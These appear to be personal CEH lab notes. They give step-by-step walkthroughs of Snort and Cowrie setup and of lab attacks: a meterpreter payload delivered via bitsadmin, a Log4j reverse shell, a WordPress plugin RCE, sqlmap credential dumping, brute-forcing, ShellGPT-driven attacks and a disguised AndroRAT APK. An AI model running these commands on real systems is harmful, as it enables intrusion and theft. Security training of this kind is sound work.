- go back to the 2022 mechine and login to moviescope website using its credentials
- come back to the windows 11 and open hetty and find the POST request and Select the POST request and in the lower section of the page, select Body tab under POST section
- Under the Body tab, you can observe the captured user credentials
- go back to the 2022 machine and turn off the proxy settings

Detect Session Hijacking

Detect Session Hijacking :~
- open the windows 11 machine and open the wireshark with ethernet interface
- we shall launch a session hijacking attack on the target machine (Windows 11) using bettercap
- open the kai linux and sudo su and cd and type:
  - bettercap -iface eth0
  - -iface: specifies the interface to bind to (here, eth0)
- Type net.probe on and press Enter
- Type net.recon on and press Enter (The net.recon module displays the detected active IP addresses in the network. In real-time, this module will start sniffing network packets)
- Type net.sniff on and press Enter
- You can observe that bettercap starts sniffing network traffic on different machines in the network
- witch back to the Windows 11 machine and observe the huge number of ARP packets captured by the Wireshark

Evading IDS, Firewalls, and Honeypots

Perform Intrusion Detection using Various Tools

Detect Intrusions using Snort :~
- open window 11 and open the snort or exicute the snort or install the snort
- copy the snort.conf and paste it to C:\Snort\etc
- copy so_rules, rules and preproc_rules to C:\Snort\
- open cmd and if its not working open cmd as administrator
- change directory cd C:\Snort\bin
- enter snort command to excicute the snort
- type snort -W
  - This command lists your machine's physical address, IP address, and Ethernet Drivers
- Observe your Ethernet Driver index number and write it down
- To enable the Ethernet Driver, in the command prompt, run command
  - snort -dev -i 2 (2 = driver index number)
- leave the snort and open another command prompt
- ping google.com
  - This ping command triggers a Snort alert in the Snort command prompt with rapid scrolling text
- close the both command prompt
- Configure the snort.conf file, located at C:\Snort\etc and open that snort file in notepad
- the Step #1: Set the network variables section (Line 41) of the snort.conf file. In the HOME_NET line (Line 45), replace any with the IP addresses of the machine(10.10.1.11, in which system the snort is running)
- then make changes in the DNS_SERVERS line by replacing $HOME_NET with your DNS Server IP address(8.8.8.8)
- Scroll down to RULE_PATH (Line 104). In Line 104, replace ../rules with C:\Snort\rules in Line 105, replace ../so_rules with C:\Snort\so_rules and in Line 106, replace ../preproc_rules with C:\Snort\preproc_rules
- In Lines 109 and 110, replace ../rules with C:\Snort\rules and minimize the notepad
- Navigate to C:\Snort\rules, and create two text files; name them white_list and black_list and change their file extensions from .txt to .rules
- Switch back to Notepad++, scroll down to the Step #4: Configure dynamic loaded libraries section (Line 238)
- Add the path to dynamic preprocessor libraries (Line 243); replace /usr/local/lib/snort_dynamicpreprocessor/ with your dynamic preprocessor libraries folder location is C:\Snort\lib\snort_dynamicpreprocessor
- At the path to base preprocessor (or dynamic) engine (Line 246), replace /usr/local/lib/snort_dynamicengine/libsf_engine.so with your base preprocessor engine C:\Snort\lib\snort_dynamicengine\sf_engine.dll
- Add (space) in between # and dynamicdetection (Line 249)
- he Step #5: Configure preprocessors section
- Comment out all the preprocessors listed in this section by adding '#' and (space) before each preprocessor rule (261-265)
- Scroll down to line 321 and delete lzma keyword and a (space)
- to Step #6: Configure output plugins (Line 513)
- These two files are in C:\Snort\etc. Provide this location of files in the configure output plugins (in Lines 527 and 528) (i.e., C:\Snort\etc\classification.config and C:\Snort\etc\reference.config
- In Step #6, add to line (529) output alert_fast: alerts.ids:
  - this command orders Snort to dump all logs into the alerts.ids file
- In the snort.conf file, find and replace the ipvar string with var using find and replace option
  - By default, the string is ipvar, which is not recognized by Snort
- we have enabled the ICMP rule so that Snort can detect any host discovery ping probes directed at the system running Snort
- Navigate to C:\Snort\rules and open the icmp-info.rules file with Notepad
- line 21, type
```
      alert icmp $EXTERNAL_NET any -> $HOME_NET 10.10.1.11 (msg:"ICMP-INFO PING"; icode:0; itype:8; reference:arachnids,135; reference:cve,1999-0265; classtype:bad-unknown; sid:472; rev:7;)       
```
- save the notepad and close
- now open command prompt or command prompt as administrator and chamge directory cd C:\Snort\bin\
- run the command
```
     snort -iX -A console -c C:\Snort\etc\snort.conf -l C:\Snort\log -K ascii
```
  - here X = device index number(in this task it is 2)
- If you receive a fatal error, you should first verify that you have typed all modifications correctly into the snort.conf file
- If you have entered all command information correctly, you receive a comment stating Commencing packet processing (pid=xxxx)
- After initializing interface and logged signatures, Snort starts and waits for an attack and triggers alerts when attacks occur on the machine
- leave the command prompt running and open another mechine for check the snort
- open command prompt and run ping 10.10.1.11 -t
- switch back to the windows 11 and observe that the snort triggers the alarm
- Go to the C:\Snort\log\10.10.1.19 folder and open the ICMP_ECHO.ids file with Notepad and you will see all the log entries are stored in ICMP_ECHO.ids
Deploy Cowrie Honeypot to Detect Malicious Network Traffic :~
- switch to the Ubuntu machine and login
- Ubuntu machine, we will deploy Cowrie honeypot
- Open a Terminal window and execute
```
     sudo adduser --disabled-password cowrie
```
  - Leave Full Name, Room Number, Work Phone, Home Phone, Other blank and type Y when prompted Is the information correct? [Y/n]
- Files icon and navigate to ceh tools on 10.10.1.11/CEHv13 Module 12 Evading IDS, Firewalls, and Honeypots/Honeypot Tools and copy cowrie folder and paste it into /home/ubuntu
- Open Files and navigate to the + Other Locations from the left pane In the Connect to Server field, type smb://10.10.1.11 and press Enter to access Windows 11
- pen a new terminal and execute sudo su to run the programs as a root user and cd cowrie for cowrie directory
- run this command for download dependency files
```
     pip install --upgrade -r requirements.txt
```
- cd .. run this for previous directory
- for modify the file permision
```
     chmod -R 777 cowrie
```
- run this command to redirect the traffic coming on port 22 to port 2222
```
     iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222
```
  - -t nat specifies the table in which the rule should be added
  - A PREROUTING specifies that the rule should be appended to the PREROUTING chain
  - -p tcp specifies the protocol to which the rule should apply
  - --dport 22 specifies the destination port
  - -j REDIRECT specifies the target of the rule
  - --to-port 2222 specifies the port to which the packet should be redirected
- run the following commands to configure authbind, enabling the Cowrie honeypot to operate on port 22 without requiring root privileges
  - run this command to create an authbind configuration file for port 22:
    - touch /etc/authbind/byport/22
  - run this command to change the ownership of the authbind configuration file for port 22 to the user and group "cowrie,"
    - chown cowrie:cowrie /etc/authbind/byport/22
  - run this command to set appropriate permissions on the authbind configuration file for port 22
    - chmod 770 /etc/authbind/byport/22
- run this command to create virtual environment
```
     virtualenv --python=python3 cowrie-env
```
- run this command to activate the evironment
```
     source cowrie-env/local/bin/activate
```
- exit from the root user using exit commmand and change directory to cowrie using cd cowrie
- run this command to initiate the Cowrie honeypot and begin monitoring and logging incoming traffic for security analysis and threat detection purposes
  - bin/cowrie start
- switch back to the user to superuser using sudo su
- to navigate to var/log/cowrie use the command cd var/log/cowrie/
- run this command to view log file
  - tail cowrie.log
- we will use Parrot Security machine as an attacker to attack the honeypot running SSH service. To do so, firstly we will scan the target machine for open SSH port
- open the parrot mechine and run sudo su for toor previlage
- run this command to discover open ports and services
  - nmap -p- -sV 10.10.1.9
- You can observe that the port 22 is open and is the default port used for SSH connection
- To establish a connection to the target machine via SSH, we will use PuTTY. Initiate the PuTTY interface by executing putty command
- enter the ipaddress and click open
- try to login to honeypot system using credentials
- switch back to Ubuntu machine, and run tail cowrie.log then you can see what attacker try to access your system you can see here
- whatever attacker try to do and try to access to your honeypot system you can see in tail cowrie.log

Evade IDS/Firewalls using Various Evasion Techniques

Evade Firewall through Windows BITSAdmin :~
- switch to the Windows Server 2019 machine and launch Control Panel
  - control panel --> system and security --> Windows Defender Firewall --> Turn Windows Defender Firewall on or off --> Turn on Windows Defender Firewall under Private network settings and Public network settings
- switch to the Parrot Security machine. Open a Terminal window and execute sudo su
- create payload using metasploit framework
```
     msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=444 -f exe > /home/attacker/Exploit.exe
```
- create a directory to share this file with the target machine, provide the permissions, and copy the file from /home/attacker to the shared location
  - mkdir /var/www/html/share/
  - chmod -R 755 /var/www/html/share
  - chown -R www-data:www-data /var/www/html/share
  - cp Exploit.exe /var/www/html/share
- now you will start the apache server
  - service apache2 start
- switch to Windows Server 2019
- open the Windows PowerShell
- this BITSAdmin transfers the file
  - bitsadmin /transfer Exploit.exe http://10.10.1.13/share/Exploit.exe c:\Exploit.exe
- Open File Explorer and Navigate to C: drive, you can see that the malicious file is successfully transferred

Hacking Web Servers

Footprint the Web Server

Footprint a Web Server using Netcat and Telnet :~
- open the parrot mechine and open terminal and enter sudo su for root access
- now i am footprint the web-server using Netcat
- using this Natcat command
```
      nc -vv www.moviescope.com 80
```
  - nc = netcat
  - -vv = very verbos
  - 80 = port number
- after this command enter this
  - GET / HTTP/1.0
- click enter 2 times and here your details
- clear
- now we are using telnet for webserver footprinting
- using this Telnet commmand
```
      telnet www.moviescope.com 80
```
- after this command enter this
  - GET / HTTP/1.0
- click enter 2 times and here your details
Enumerate Web Server Information using Nmap Scripting Engine (NSE) :~
- open parrote machine terminal and sudo su for root user
- This script enumerates and provides you with the output details
```
      nmap --script hostmap-bfk -script-args hostmap-bfk.prefix=hostmap- www.goodshopping.com
```
- This script will detect a vulnerable server that uses the TRACE method by sending an HTTP TRACE request that shows if the method is enabled or not
```
      nmap --script http-trace -d www.goodshopping.com
```
- This command will scan the host and attempt to determine whether a web server is being monitored by an IPS, IDS, or WAF
```
      nmap -p80 --script http-waf-detect www.goodshopping.com
```
- This concludes the demonstration of how to enumerate web server information using the Nmap Scripting Engine (NSE)

Perform a Web Server Attack

Crack FTP Credentials using a Dictionary Attack :~
- open the parrot machine and open the terminal and and type the sudo su for root users
- Perform an Nmap scan on the target machine (Windows 11) to check if the FTP port is open
```
      nmap -p 21 [IP Address of target system]
```
- Observe that port 21 is open in Windows 11 and Check if an FTP server is hosted on the Windows 11 machine
- ftp [IP Address of target mechine]
- You will be prompted to enter user credentials. The need for credentials implies that an FTP server is hosted on the machine
- Try entering random usernames and passwords in an attempt to gain FTP access
- you will not be able to log in to the FTP server. Close the terminal window
- to attempt to gain access to the FTP server, perform a dictionary attack using the THC Hydra tool
- copy Wordlists folder and Paste the copied folder (Wordlists) on the Desktop
- In the Parrot Security machine, open a Terminal window and execute sudo su to run the programs as a root user
- enter the commands Hydra tries various combinations of usernames and passwords
```
      hydra -L /home/attacker/Desktop/Wordlists/Usernames.txt -P /home/attacker/Desktop/Wordlists/Passwords.txt ftp://[IP Address of target mechine]
```
- On completion of the password cracking, the cracked credentials appear
- Try to log in to the FTP server using one of the cracked username and password combinations. In this lab, use Martin's credentials to gain access to the server
- In the terminal window, run
  - ftp [IP Address of target machine]
- Enter Martin's user credentials (Martin and apple) to check whether you can successfully log in to the server
- On entering the credentials, you will successfully be able to log in to the server
- you can remotely access the FTP server hosted
- Run mkdir Hacked to remotely create a directory named Hacked on the Windows 11 machine through the ftp terminal
- open target mechine and open c:\ftp
- switch back to parrot machine and help and it will show all commands
- quit
- This concludes the demonstration of how to crack FTP credentials using a dictionary attack and gain remote access to the FTP server
Gain Access to Target Web Server by Exploiting Log4j Vulnerability :~
- open ubantu and open the terminal and type sudo su for root user
- for update type this command
  - sudo apt-get update
- we want to install the docker command is
```
      sudo apt-get install docker.io
```
- docker is successfully completed installation enter this command to redirect the directory
  - cd log4j-shell-poc/
- we need to setup log4j vulnerable server to type command
```
      docker build -t log4j-shell-poc . (. full stop also important)
```
- to start the vulnerable server type command
```
      docker run --network host log4j-shell-poc
```
- Leave the server running in the Ubuntu machine
- open parrot machine and sudo su for root user
- We will first scan the target machine to identify any vulnerable services running on it so use command
```
      nmap -sV -sC 10.10.1.9
```
  - 10.10.1.9 = its a target ip address
- rom the result we can see that port 8080 is open and Apache Tomcat/Coyote 1.1 server is running on the target system
- Upon investigation we can see that Apache is vulnerable to Remote Code Execution (RCE) attack
- to view the RCE vulnerabilities on the Apache server
  - searchsploit -t Apache RCE
- Now, we need to select a vulnerability to exploit the Server from the list, from the Nmap scan we found that the Apache Tomcat server is running on JSP so we will target java vulnerabilities from the list of vulnerabilities
- We can see that Java platform is vulnerable for Apache Log4j 2 - Remote Command Execution (RCE) exploit
- We will now exploit Log4j vulnerability present in the target Web Server to perform Remote code execution
- Click the Firefox icon and In the address bar of the browser, type
```
      http://10.10.1.9:8080
```
- As we can observe that the Log4j vulnerable server is running on the Ubuntu machine
- for log4j-shell-poc directory type
```
      cd log4j-shell-poc/
```
- we needed to install JDK 8, to do that open a new terminal window and type sudo su
- We need to extract JDK zip file and type to extract the file
```
      tar -xf jdk-8u202-linux-x64.tar.gz
```
- Now we will move the jdk1.8.0_202 into /usr/bin/. To do that, type
```
      mv jdk1.8.0_202 /usr/bin/
```
- we need to update the installed JDK path in the poc.py file so Navigate to the previous terminal window. In the terminal, type pluma poc.py
- In the poc.py file scroll down and in line 62, replace
  - jdk1.8.0_20/bin/javac --> /usr/bin/jdk1.8.0_202/bin/javac
- scroll down to line 87 and replace
  - jdk1.8.0_20/bin/java --> /usr/bin/jdk1.8.0_202/bin/java
- Scroll down to line 99 and replace
  - jdk1.8.0_20/bin/java --> /usr/bin/jdk1.8.0_202/bin/java
- After making all the changes save the changes and close the poc.py
- open a new terminal window and type
  - nc -lvp 9001
- Switch to previous terminal window and type and press Enter, to start the exploitation and create payload
```
      python3 poc.py --userip 10.10.1.13 --webport 8000 --lport 9001
```
- copy the payload generated in the send me: section
- Switch to Firefox browser window, in Username field paste the payload that was copied in previous step and in Password field type password and press Login
- Now switch to the netcat listener, you can see that a reverse shell is opened
- In the listener window type pwd and whoami
- The Log4j vulnerability takes the payload as input and processes it, as a result we will obtain a reverse shell

Perform a Web Server Hacking using AI

Perform Web Server Footprinting and Attacks using ShellGPT :~
- open the parrot machine and open the terminal and activate the sgpt using AI acr=tivation key
- using bash sgpt.sh we can activate sgpt using AI activation key
- To perform directory traversal using ShellGPT, run
```
      sgpt --shell "Perform a directory traversal on target url https://certifiedhacker.com using gobuster
```
- To perform FTP bruteforce attack run
```
      sgpt --shell "Attempt FTP login on target IP 10.10.1.11 with hydra using usernames and passwords file from /home/attacker/Wordlists" 
```
- To perform webserver footprinting on target IP address using ShellGPT, run
```
      sgpt --shell "Perform webserver footprinting on target IP 10.10.1.22"
```
- to perform web server footprinting using netcat
```
      sgpt --shell "Perform web server footprinting on target IP 10.10.1.22 using Netcat by sending an HTTP request and analyzing the response."
```
- To perform website mirroring using ShellGPT, run
```
      sgpt --shell "Mirror the target website certifiedhacker.com"
```
- Alternatively you can use Httrack to mirror a target website, to do so run
```
      sgpt --shell "Mirror the target website https://certifiedhacker.com with httrack on desktop"
```
- To view the mirrored website navigate to Places -> Home Folder -> certifiedhacker.com location and double-click on index.html file
- The mirrored certifiedhacker.com website opens up in Firefox browser

Hacking Web Applications

Footprint the Web Infrastructure

Perform Web Application Reconnaissance using Nmap and Telnet :~
- Use tools such as:
  - Netcraft - https://www.netcraft.com
  - SmartWhois - https://www.tamos.com)
  - WHOIS Lookup - https://whois.domaintools.com
  - Batch IP Converter - http://www.sabsoft.com
- Perform DNS Interrogation:
  - DNSRecon - https://github.com
  - Domain Dossier - https://centralops.net
- we will perform port scanning to gather information
- open parrot security and type sudo su for root user and type cd for root directory
```
      nmap -T4 -A -v [Target Web Application]
```
  - -T4 = for fast and aggressive respose
  - -A = Aggressive
  - -v = verbose
  - target web application = www.moviescope.com
- You can observe that the target machine name, NetBIOS name, DNS name, MAC address, OS, and other information is displayed
- perform banner grabbing to identify the make, model, and version of the target web server software
```
      telnet www.moviescope.com 80
```
  - The Trying 10.10.1.19… message appears; type
    - GET / HTTP/1.0 (after this press enter 2 times)
- the server is identified as Microsoft-IIS/10.0 and the technology used is ASP.NET
- This concludes the demonstration of how to perform web application reconnaissance (Whois lookup, DNS interrogation, port and services discovery, banner grabbing, and firewall detection)
Perform Web Spidering using OWASP ZAP :~
- open parrot machine adn type sudo su for root user amd type cd for root directory
- open QWASP ZAP we have to type
  - zaproxy
- After completing initialization, a prompt that reads Do you want to persist the ZAP Session? appears; select the No, I do not want to persist this session at this moment in time radio button and click Start
- click Automated Scan
- under the URL to attack field (here, www.moviescope.com). Leave the other settings to default and click the Attack button
- click siper tab and After performing web spidering, OWASP ZAP performs active scanning. Navigate to the Active Scan tab to observe the various scanned links
- check all spider tab and message tab and other tabs
Perform Web Application Vulnerability Scanning using SmartScanner :~
- open windows 11 mechine and search smartscanner and launch smart scanner
- In the enter site address to scan field, enter www.moviescope.com and click enter for scan
- Once the tool completes scanning, it will display the issues that are found under Found Issues section and Severity of Issues
- expand Password Sent Over HTTP and click on first http://www.moviescope.com
- check the description, reccommandation, refference and you can check CWE also
- CWE website appears in Microsoft Edge web browser, displaying the details of CWE-319 ClearText Transmission of Sensitive Information
- you check all in issue section and check vulnerability and sensitive data also
- You can also use other web application vulnerability scanning tools such as
  - WPScan Vulnerability Database - https://wpscan.com
  - Codename SCNR - https://ecsypno.co
  - AppSpider - https://www.rapid7.com
  - Uniscan - https://github.com
  - N-Stalker - https://www.nstalker.com

Perform Web Application Attacks

Perform a Brute-force Attack using Burp Suite :~
- In this task, the target WordPress website (http://10.10.1.22:8080/CEH) is hosted by the victim machine, Windows Server 2022. Here, the host machine is the Parrot Security machine
- Wampserver is running in Windows Server 2022 machine. To run the WampServer
- open windows sever 2022 and launch the wampserver and it will notifiy as green after the launch
- go to the parrot machine
- Launch the Mozilla Firefox web browser and go to
```
      http://10.10.1.22:8080/CEH/wp-login.php?.
```
- we shall set up a Burp Suite proxy by first configuring the proxy settings of the browser
- in mozila firefox set the proxy and HTTP Proxy as 127.0.0.1 and the Port as 8080. Tick the Also use this proxy for HTTPS checkbox
- open the burpsuit and open the temperory project and start burpsuit as default
- in the proxy tab the intercept is active whether it was off please turn it on
- go back to the browser page in word press website type random credentials as admin and password and click login
- in burpsuite HTTP request was intercepted by the application
- right click anywhere and click Send to Intruder
- click on the Intruder tab from the toolbar and observe that under the Intruder tab, the Positions tab appears by default
- In the Positions tab under the Intruder tab observe that Burp Suite sets the target positions by default, as shown in the HTTP request. Click the Clear § button from the right-pane to clear the default payload values
- select Cluster bomb from the Attack type
- Now, we will set the username and password as the payload values
- select the username value entered in Step#14 and click Add § from the right-pane. Similarly, select the password value entered in Step#14 and click Add § from the right-pane
- Navigate to the Payloads tab under the Intruder tab and ensure that under the Payload Sets section, the Payload set is selected as 1, and the Payload type is selected as Simple list
- Under the Payload settings [Simple list] section, click the Load… button
- and select the username.txt inside the wordlist folder
- next step is set the payload set is select as 2 and payload type is simple list
- click load option and select the password.txt file
- click start attack
- Intruder attack of 10.10.1.22 window appears as the brute-attack initializes
- scroll down and observe the different values of Status and Length. Here, Status=302 and Length= 1155
- Raw tab under the Request tab, the HTTP request with a set of the correct credentials is displayed. (here, username=admin and password=qwerty@123)
- Now, that you have obtained the correct user credentials, close the Intruder attack of 10.10.1.22 window
- Navigate back to the Proxy tab and click the Intercept is on button to turn off the interception. The Intercept is on button toggles to Intercept is off
- open firfox and open setting and proxy section and turn of that section select the no proxy and close
- Reload the target website http://10.10.1.22:8080/CEH/wp-login.php?, enter the Username and Password that is admin and qwerty@123 and click login
- you are successfull logged in the wordpress website this is the demonstration of this lab
Perform Remote Code Execution (RCE) Attack :~
- switch to the Windows Server 2022 and open the wampserver 64
- Wait for this icon to turn green, which indicates that the WampServer is successfully running
- open web browser and go to
```
      http://10.10.1.22:8080/CEH/wp-login.php?
```
- wordpress page will appears and Type Username or Email Address and Password as admin and qwerty@123. Click the Log In
- Hover your mouse cursor on Plugins in the left pane and click Installed Plugins
- In the Plugins page, observe that User Post Gallery is installed. Click Activate under the User Post Gallery
- switch to the Parrot Security machine
- Open Mozilla Firefox web browser and go to https://wpscan.com/ and login to the wpscan account
- Get Started button and click Start for free button under Researcher section
- Edit Profile page appears; in the API Token section and observe the API Token. Note down or copy this API Token
- close the firefox window and open terminal and enter sudo su and cd for root directory
- run the command
```
      wpscan --url http://10.10.1.22:8080/CEH --api-token [API Token what we copied]
```
- Scroll down to the Plugin(s) Identified section, and observe the installed vulnerable plugins (wp-upg) on the target website
- In the Plugin(s) Identified section, within the context of the wp-upg plugin, an Unauthenticated Remote Code Execution (RCE) vulnerability
- In this task, we will exploit the RCE vulnerability present in the wp-upg plugin
- to perform RCE run command
```
      curl -i 'http://10.10.1.22:8080/CEH/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:whoami:NULL:NULL'
```
- This curl command exploits a WordPress plugin vulnerability by sending a malicious request to the admin-ajax.php file
- whoami command was executed, yielding the outcome nt authority\ \system
- This concludes the demonstration of performing RCE attack

Detect Web Application Vulnerabilities using Various Web Application Security Tools

Detect Web Application Vulnerabilities using Wapiti Web Application Security Scanner :~
- switch to the Parrot Security machine. Open a Terminal window and execute sudo su for root user
- in terminal window and type cd wapiti
- type python3 -m venv wapiti3 to create virtual environment in python
- run command for activate the virtual environment
```
      . wapiti3/bin/activate
```
- run this command to install wapiti web application security scanner
- pip install .
- run command for wapiti web application security scanner
```
      wapiti -u https://www.certifiedhacker.com
```
- run this command to navigate generate_report directory
```
      cd /root/.wapiti/generated_report/
```
- Run ls command to view the contents of the directory we can see that the certifiedhacker.com_xxxxxxxx_xxxx.html file is created
- run command to copy this file to /home/attacker/
```
      cp certifiedhacker.com_xxxxxxxx_xxxx.html /home/attacker/ 
```
- Open a new terminal and run firefox certifiedhacker.com_xxxxxxxx_xxxx.html command to open the .html file in Firefox browser
- Wapiti scan report opens upp in Firefox browser, you can analyze the scan result with the discovered vulnerabilities

Perform Web Application Hacking using AI

Perform Web Application Hacking using ShellGPT :~

open parrot security and open the terminal and type sudo su
open sgpt usimg command
- bash sgpt.sh
use the activation key

run this command for detect the WAF

      sgpt --shell "Check if the target url www.certifiedhacker.com has web application firewall"

run thos command for detect the WAF using wafwoof

      sgpt --shell "Check if the target url https://www.certifiedhacker.com is protected with web application firewall using wafwoof"

to detect the load balancer use this command

      sgpt --shell "Use load balancing detector on target domain yahoo.com."

run this command for To identify server side technologies

      sgpt --chat HWA --shell "Launch whatweb on the target website www.moviescope.com to perform website footprinting. Run a verbose scan and print the output. Save the results in file whatweb_log.txt."

To view the generated whatweb_log.txt file contents, navigate to /home/attacker and double-click on whatweb_log.txt file

run this command command to identify web application vulnerabilities on a target website

      sgpt --shell "Perform the Vulnerability scan on the target url www.moviescope.com"

run this command to perform web application scanning using Nmap

      gpt --shell "Perform the Vulnerability scan on the target url www.moviescope.com using nmap"

To perform a vulnerability scan on web application using Sniper tool run

      sgpt --shell "Use Sn1per tool and scan the target url www.moviescope.com for web vulnerabilities and save result in file scan3.txt"

To identify files of a web application run

      sgpt --shell "Scan the web content of target url www.moviescope.com using Dirb"

run this command to identify directories using Gobuster

      sgpt --shell "Scan the web content of target url www.moviescope.com using Gobuster"

To perform FTP bruteforce attack run

      sgpt --shell "Attempt FTP login on target IP 10.10.1.11 with hydra using usernames and passwords file from /home/attacker/Wordlists"

run this command to to automate web application hacking tasks with custom scripts

      sgpt --chat wah --shell "create and run a custom script for web application footprinting and vulnerability scanning. The target url is www.certifiedhacker.com"

To create a custom python script for web application scanning run

      sgpt --chat wah --shell "create and run a custom python script for web application footprinting and vulnerability scanning. The target url is www.certifiedhacker.com"

To create a custom python script for web application scanning run

      sgpt --chat wah --shell "create and run a custom python script which will run web application footprinting tasks to gather information and then use this information to perform vulnerability scanning on target url is www.certifiedhacker.com"

To perform Web application fuzz testing using ShellGPT run

      sgpt --shell "Fuzz the target url www.moviescope.com using Wfuzz tool"

SQL Injection

Perform SQL Injection Attacks

Perform an SQL Injection Attack Against MSSQL to Extract Databases using sqlmap :~
- tool = sqlmap
- open the parrot machine and open the firefox browser and open the moviescope.com website
- login using credential is sam and test
- ofter login click view profile
- open the same page inspect page and click console option and at the end type document.cookie and click enter
- after click that after that you can see one cookie value copie that and note down that
- note down that page url present in the browser
- minimize the browser and open the terminal and type sudo su for root user
- he below query causes sqlmap to enforce various injection techniques on the name parameter of the URL in an attempt to extract the database information of the MovieScope website
- it will give the database list also
- enter this command
```
      sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="[cookie value that you copied]" --dbs
```
  - -u = specifies the target URL
  - --cookie = specifies the HTTP cookie header value
  - --dbs = enumerates DBMS databases
- after that it will ask any permission give all Y to that
- sqlmap retrieves the databases present in the MSSQL server. It also displays information about the web server OS, web application technology, and the backend DBMS
- now you need to choose the database and use sqlmap to retrieve the tables in the database
- The below query causes sqlmap to scan the moviescope database for tables located in the database
```
      sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="[cookie value which you have copied]" -D moviescope --tables 
```
  - -D = specifies the DBMS database to enumerate
  - --tables = enumerates DBMS database tables
- you need to retrieve the table content of the column User_Login run this query
```
    sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="[cookie value which you have copied]" -D moviescope -T User_Login --dump   
```
- sqlmap retrieves the complete User_Login table data from the database moviescope, containing all users' usernames under the Uname column and passwords under the password column
- the passwords are shown in plain text form
- if we want to verify that username and password we must go to the browser and again open the moviescope.com and login using thos credentials
- login successfull we made the exploit is successfull
- if you want to open the interactive OS shell
```
      sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="[cookie value which you have copied]" --os-shell
```
  - --os-shell = this is the prompt for an interactive OS shell
- it will provide you with the OS shell. Type hostname and press Enter to find the machine name where the site is running
- Type TASKLIST and press Enter to view a list of tasks that are currently running on the target system

Detect SQL Injection Vulnerabilities using Various SQL Injection Detection Tools

Detect SQL Injection Vulnerabilities using OWASP ZAP :~
- open the window server 2019 and open the Zap 2.14.0
- OWASP ZAP initialized and a prompt that reads Do you want to persist the ZAP Session? appears; select the No, I do not want to persist this session at this moment in time radio button, and click Start
- Manage Add-ons window appears, close it
- OWASP ZAP main window appears; under the Quick Start tab, click the Automated Scan option
- in URL to attack field in this case, http://www.moviescope.com other options are the default leave and click attack
- in the down section alert section is their open that and you find the vulnerability like sql injection and expand that
- you can check the severity of risk of that vulnerability
- practical is done

Perform SQL Injection using AI

Perform SQL Injection using ShellGPT :~
- open the parrot mechine and open the terminal mechine and sudo su for root user
- activate the shellgpt using activation key
- In this lab we will use AI to perform SQL injection attack against MSSQL to extract databases
- First we need to login to http://www.moviescope.com website and copy the cookie value in the inspect page this same as the task one
- We will now, enumerate the database of the target website to do so, switch to the terminal window and run
```
      sgpt --chat sql --shell "Use sqlmap on target url http://www.moviescope.com/viewprofile.aspx?id=1 with cookie value '[cookie value which you have copied]' and enumerate the DBMS databases"
```
- We have successfully enumerated the databases from the target website
- now enumerate the tables pertaining to the database moviescope. To do so run
```
      sgpt --chat sql --shell "Use sqlmap on target url http://www.moviescope.com/viewprofile.aspx?id=1 with cookie value '[cookie value which you have copied]' and enumerate the tables pertaining to moviescope database"  
```
- After enumerating the database tables we will dump the contents of the User_Login table to view the login information of the target website
- run this command:
```
      sgpt --chat sql --shell "Use sqlmap on target url http://www.moviescope.com/viewprofile.aspx?id=1 with cookie value '[cookie value which you have copied]' and retrieve User_Login table contents from moviescope database"  
```
- Sqlmap retrieves the complete User_Login table data from the database moviescope, containing all users' usernames under the Uname column and passwords under the password column
- To verify if the login details are valid, you should try to log in with the extracted login details of any of the users
- Apart from the aforementioned commands, you can further explore additional options within the ShellGPT tool and utilize various other tools to perform SQL injection attacks on the target website

Hacking Wireless Networks

Perform Wireless Traffic Analysis

Wi-Fi Packet Analysis using Wireshark :~
- tool = wireshark
- we are observe the WPA2crack-01.cap file in wireshark here
- analysing the packets

Perform Wireless Attacks

Crack a WPA2 Network using Aircrack-ng :~
- tool = aircrack-ng
- open terminal in parrot machine and type sudo su
- create simple handshake file and password file
- run this command for crack the wpa2 passworf
```
      aircrack-ng -a2 -b [Target BSSID] -w /home/attacker/Desktop/Wordlist/password.txt '/home/attacker/Desktop/Sample Captures/WPA2crack-01.cap'
```
- you did the practical

Hacking Mobile Platforms

Hack Android Devices

Exploit the Android Platform through ADB using PhoneSploit-Pro :~
- tool = phonesploit-pro
- open the parrot and sudo su for root user
- cd PhoneSploit-Pro
- command to run tool:
  - python3 phonesploitpro.py
- PhoneSploit Pro main menu options appear
- you have so many option to get info about that android
- choose the option and get info of the android
Hack an Android Device by Creating APK File using AndroRAT :~
- tool = AndroRAT
- open the parrot and sudo su for root user
- cd AndroRAT
- run this command to create a apk file
```
      python3 androRAT.py --build -i 10.10.1.13 -p 4444 -o SecurityUpdate.apk 
```
  - --build = is used for building the APK
  - -i = specifies the local IP address (here, 10.10.1.13)
  - -p = specifies the port number (here, 4444)
  - -o = specifies the output APK file (here, SecurityUpdate.apk)
- to create directory and give the root privillage to that directory and commands are in belowe
```
      mkdir /var/www/html/share
      chmod -R 755 /var/www/html/share
      chown -R www-data:www-data /var/www/html/share
```
- start the apache
  - service apache2 start
- run this command for start listening to the victim machine
```
      python3 androRAT.py --shell -i 0.0.0.0 -p 4444
```
  - --shell = is used for getting the interpreter
  - -i = specifies the IP address for listening (here, 0.0.0.0)
  - -p = specifies the port number (here, 4444)
- You can observe that AndroRAT starts waiting for a connection
- open the android and open the chrome and enter this url
```
      http://<host_ip>/share
```
- download that file and install that file and accept all the permissions
- open that apk it will open but it is invisible but run in background
- go back to the parrot machine the interpreter session will open in the terminal
- type the help command you can see so many option in their
- you can get all target device informations

Secure Android Devices using Various Android Security Tools

Secure Android Devices from Malicious Apps using AVG :~
- open the AGV antivirus app and click start scanning
- after scanning it will give the report of is their any malware and threats
- after that you can fix this and delete this

IoT and OT Hacking

Perform Footprinting using Various Footprinting Techniques

Gather Information using Online Footprinting Tools :~
- open windows machine and open the firefox and tab and ope this
```
      https://www.whois.com/whois
```
- type www.oasis-open.org and click search
- open a new tab, and go to
```
      https://www.exploit-db.com/google-hacking-database
```
- type SCADA in the Quick Search field and press Enter
- Open a new tab and go to https://www.google.com. In the search field, enter
```
      "login" intitle:"scada login"
```
- The search result appears; click any link (here, SEAMTEC SCADA login)
- you can use advanced search operators such as intitle:"index of" scada to search sensitive SCADA directories
- open a new tab and go to
```
      https://account.shodan.io/login
```
- login to the shodan
- The Shodan main page appears; type port:1883 in the address bar and press Enter
